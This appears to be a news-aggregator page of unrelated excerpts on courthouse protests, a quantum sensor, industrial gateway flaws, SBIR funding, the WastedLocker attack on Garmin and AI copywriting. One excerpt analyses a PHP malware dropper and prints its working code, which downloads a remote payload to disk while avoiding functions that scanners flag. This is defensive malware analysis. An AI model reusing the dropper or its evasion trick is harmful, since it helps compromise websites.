Portland Riots Read-out: August 7

Bottom line:

Activity in the vicinity of the Mark O. Hatfield Federal Courthouse once again remained peaceful – in sharp contrast to the violent nightly siege of previous weeks. Thursday evening marked a fifth consecutive night with zero attacks directed at federal officers or federal property. The change is directly attributable to the long-awaited cooperation from state and local law enforcement, which began last week, but should have been the case all along. 

PHP Binary Downloader

When possible, an attacker will want to avoid using specific functions in their PHP code that they know are more likely to be flagged by a scanner. Some examples of suspicious functions commonly detected include system and file_put_contents.

In this malware dropper file we recently found on a compromised website, the attacker chose to create a user-defined PHP function getFile to accomplish the same task as file_put_contents. Their objective is to essentially download and store binary data from a third party resource without being detected.

function getFile($url, $path) { $newfname = $path; $file = fopen ($url, 'rb'); if ($file) { $newf = fopen ($newfname, 'wb'); if ($newf) { while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8), 1024 * 8); }}} if ($file) { fclose($file); } if ($newf) { fclose($newf); }} getFile("hxxp://[redacted]/payload.zip","ss.zip");

Friday Squid Blogging: New SQUID

There’s a new SQUID:

A new device that relies on flowing clouds of ultracold atoms promises potential tests of the intersection between the weirdness of the quantum world and the familiarity of the macroscopic world we experience every day. The atomtronic Superconducting QUantum Interference Device (SQUID) is also potentially useful for ultrasensitive rotation measurements and as a component in quantum computers.

Protocol gateway flaws reveal a weak point in ICS environments

Security researchers warn about widespread vulnerabilities in protocol gateways, small devices that connect industrial machinery and sensors to TCP/IP networks that are used to automate and control them. New research published this week by Trend Micro and presented at the Black Hat USA virtual security conference highlights a new threat via protocol translation attacks and reveals 9 flaws found in protocol gateways from different vendors.

How to access ‘America’s Seed Fund,’ the $3 billion SBIR program

One of the best-kept secrets in the world of capital is that the federal government has billions of dollars it’s dying to give away to early-stage founders and inventors — and all you have to do is ask. Well, there’s a bit more to it than that, so here’s a guide to getting in the door of the massive Small Business Innovation Research program.

Morphisec Knowledge Update: New WastedLocker Ransomware Causes Havoc Among Some of the Leading Enterprises in the U.S.

Garmin has confirmed that the recent outage its users experienced was indeed the result of a successful ransomware attack. However, the extent of the damage done is still unclear. The attack, which compromised Garmin’s servers for five days, impacted millions of users globally and will likely end up costing Garmin millions of dollars in lost productivity and reputation alone. While Garmin says that no customer data was leaked, Garmin’s call centers, web site, and cloud-based services such as Garmin Connect and FlyGarmin (a commercial aviation navigation service) were either taken offline or negatively impacted as a result of the attack.

Hypotenuse AI wants to take the strain out of copywriting for e-commerce

Imagine buying a dress online because a piece of code sold you on its ‘flattering, feminine flair’ — or convinced you ‘romantic floral details’ would outline your figure with ‘timeless style’. The very same day your friend buy the same dress from the same website but she’s sold on a description of ‘vibrant tones’, ‘fresh cotton feel’ and ‘statement sleeves’.

This Week in Security News: Robots Running the Industrial World Are Open to Cyber Attacks and Industrial Protocol Translation Gone Wrong

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. Based on research that Trend Micro released during Black Hat USA this past week, read about how some industrial robots have flaws that could make them vulnerable to advanced hackers, as well as the risks related to protocol gateways and how to secure these devices.